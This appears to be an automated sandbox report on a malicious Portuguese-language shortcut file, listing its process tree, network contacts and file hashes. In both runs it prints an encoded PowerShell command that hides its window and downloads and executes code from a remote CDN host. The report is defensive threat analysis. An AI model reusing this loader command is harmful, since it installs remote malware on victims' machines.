Analysis Overview
SHA256
f17e4e745a25bca04647fa4fc056c44835190a36d30b7cf467351ea33199bb6b
Threat Level: Known bad
The file a3894901d5099b875b8b0f7226b1904d_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 02:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 02:31
Reported
2024-06-13 02:34
Platform
win7-20240611-en
Max time kernel
121s
Max time network
126s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vaotr-rh.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2251.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2250.tmp"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 1361227624.rsc.cdn77.org | udp |
| GB | 89.187.167.7:443 | 1361227624.rsc.cdn77.org | tcp |
| GB | 89.187.167.7:443 | 1361227624.rsc.cdn77.org | tcp |
| GB | 195.181.164.17:443 | 1361227624.rsc.cdn77.org | tcp |
Files
memory/2748-38-0x000007FEF5BBE000-0x000007FEF5BBF000-memory.dmp
memory/2748-39-0x000000001B520000-0x000000001B802000-memory.dmp
memory/2748-40-0x00000000022C0000-0x00000000022C8000-memory.dmp
memory/2748-41-0x000007FEF5900000-0x000007FEF629D000-memory.dmp
memory/2748-42-0x000007FEF5900000-0x000007FEF629D000-memory.dmp
memory/2748-43-0x000007FEF5900000-0x000007FEF629D000-memory.dmp
memory/2748-47-0x000007FEF5900000-0x000007FEF629D000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\vaotr-rh.cmdline
| MD5 | c9c37412c4e78ea0e0ca3395102689a0 |
| SHA1 | 21688e857f03f11852a99da078f9125ba42f2110 |
| SHA256 | 08ea5275ed60fb83fd7485f72ce364b874242c37a17683225fc64849748cb506 |
| SHA512 | a1f9ad50d2b27c8700cd28af0c05cb7a67ef9a1b438289466c4c867fbf3a3a6bd8348eb59148d3c187fa8f6873fe4bf53baa5714d7d6614ada96a8d399beeed0 |
\??\c:\Users\Admin\AppData\Local\Temp\vaotr-rh.0.cs
| MD5 | 7b0e7177dfbb9edd1c1ef08b4fdfae2f |
| SHA1 | cb11a0252cdad66ec247312ccb7feb46456e52b6 |
| SHA256 | 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa |
| SHA512 | 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd |
\??\c:\Users\Admin\AppData\Local\Temp\CSC2250.tmp
| MD5 | 9053cace7763f13f477946bdf6264ec4 |
| SHA1 | c4607d0d3064e64f6cfe155cce87b1708dc5946c |
| SHA256 | d20ac6c682187207ea711de5d029711a87c150d2fa145764630d6dc09a37468f |
| SHA512 | 97ddf59ec90a6ca55c8862e57be9f42afb815cf0763c2126cd92355c836506b50294bd074e60510707f65d230273fab3776d210af1c42db3d1afdde94780c59d |
C:\Users\Admin\AppData\Local\Temp\RES2251.tmp
| MD5 | 4d3d7cb4bc4ed06b00551335e61f724f |
| SHA1 | 14416124515d673af368d23a5fe63e95bb857778 |
| SHA256 | 192ce989995a2c53d6fbc3a99c5203528b68ea9178e47d0ab65a94e9b4f8c143 |
| SHA512 | 08ed498642cbf8742a2274175a25df17496d4c84b118febcff68eb21a16fd182d75322d42a0e2e88d6e5b696b8b5f7823644df942c47521c5bf244e896846bf6 |
C:\Users\Admin\AppData\Local\Temp\vaotr-rh.dll
| MD5 | 519f0f8988678e2d402c51e0599a04d7 |
| SHA1 | 4a75e96d4a821ca721c85d574a187bfd50ca62a0 |
| SHA256 | 1d9a8f5011c76464941831f04933d57367c8e109de7b876667b3118c52ef1b01 |
| SHA512 | a32f8225001b78ddf9e8a669df920213b7a36b96a7cfa52caed7b15588f8f4a1ce49a051ddaf481a4a32dd4e0a7e5bba5f6cabe34cc79f7e85adcd9e860541a2 |
C:\Users\Admin\AppData\Local\Temp\vaotr-rh.pdb
| MD5 | dfd498ea7e752d5186c7e0e20e23324c |
| SHA1 | a5014734774e36a917097d320c826328b47a3f6a |
| SHA256 | 1a595fe7a0c2ec07c5689ed4196c7448121a5a4824cd2d0153c98bfadcb7d748 |
| SHA512 | 7c6a7638a5c49a0cd1919ff53bcd3d478f7eb1b268381cdd1e13d1a4ded2cb3d342b924702fcf9d55cef3ea289f1eda77d62a14c295d7f89002d16a866959e65 |
memory/2748-58-0x0000000002C60000-0x0000000002C68000-memory.dmp
memory/2748-61-0x000007FEF5900000-0x000007FEF629D000-memory.dmp
memory/2748-62-0x000007FEF5BBE000-0x000007FEF5BBF000-memory.dmp
memory/2748-63-0x000007FEF5900000-0x000007FEF629D000-memory.dmp
memory/2748-65-0x000007FEF5900000-0x000007FEF629D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 02:31
Reported
2024-06-13 02:34
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
51s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4392 wrote to memory of 4268 | N/A | C:\Windows\system32\cmd.exe | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4392 wrote to memory of 4268 | N/A | C:\Windows\system32\cmd.exe | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4268 wrote to memory of 2812 | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 4268 wrote to memory of 2812 | N/A | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 2812 wrote to memory of 4928 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 2812 wrote to memory of 4928 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-H0C42E2H.lnk
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp" "c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 1361227624.rsc.cdn77.org | udp |
Files
memory/4268-2-0x00007FFD32733000-0x00007FFD32735000-memory.dmp
memory/4268-3-0x000001E9CFC40000-0x000001E9CFC62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hp2wrhz3.ztt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4268-13-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp
memory/4268-14-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.0.cs
| MD5 | 7b0e7177dfbb9edd1c1ef08b4fdfae2f |
| SHA1 | cb11a0252cdad66ec247312ccb7feb46456e52b6 |
| SHA256 | 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa |
| SHA512 | 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd |
\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.cmdline
| MD5 | c7c971702ae33f87a3c605e7f9a8e3c2 |
| SHA1 | 514d554d797228435d6a0751801826f058c0ed29 |
| SHA256 | aa232abe9b41ebdeff838a369cc012a1a1c46b870a321e7ac2a0f5f29a1d6a4e |
| SHA512 | c14de704b6ea142b29899cfd8471a0d7d31419ac672228a2e96e39f093a3ba3f5f73e01e9a1e5c10ba13b6a275e36c6ab8ce950d20859fd106d229685f656b39 |
\??\c:\Users\Admin\AppData\Local\Temp\4mmjhbno\CSCD60A370FA8448CE91C281C09BEDF7DF.TMP
| MD5 | 32f206c989422b3df2f6225c9ac5f9be |
| SHA1 | 748aef167a738192b6ef21c964c30d9b169d2e4d |
| SHA256 | 5c3bb3f60b056476c2be7e746625fbddc7edd8cf6630dc873895511ad3964e0c |
| SHA512 | edb9f7af5c9ed9e3ddfc6e32c407fa01fd09c54e5eee8f102c4dcff53c5631650c9d131f9e96ccb6447ce9f8d4979f7a6fb0ff9fb1e32b66130c58a85b2e2c02 |
C:\Users\Admin\AppData\Local\Temp\RES50CF.tmp
| MD5 | d86f725d547cb238fc0e460a6ec552f5 |
| SHA1 | 2928afba43f00889d5e35240c7efb3d94c6e1918 |
| SHA256 | 96323c77c7ab3ce4ded15543adf859c75dc903c3acddc8cdd9c7b5d11e847f81 |
| SHA512 | a3c5251303214d05e6c20a74ce13c1ea4eb357e64484b3cdd4214a496b6b20649a04bfcf8421da8e00622cff6cf4fb38bf20550ce7293c0cfae0c8bcc7ed6017 |
memory/4268-27-0x000001E9CFC90000-0x000001E9CFC98000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4mmjhbno\4mmjhbno.dll
| MD5 | 0c39411b5d7354d62bc468e1ecc003cf |
| SHA1 | f303e17b70669aafd6a78621c683cbbc0e9d68b3 |
| SHA256 | d79a3d27b16155dc85d3ee3119a11db06077c704acfae526f9bfe1cb5e1fb6bb |
| SHA512 | 00c71134e54b4b256b7de7de91b40a6af2261244ede10b808e95011a96f37f9982c0fe51d79b134574d01b088236456008caa6418037d41d45bf2e9ed3ed8641 |
memory/4268-31-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp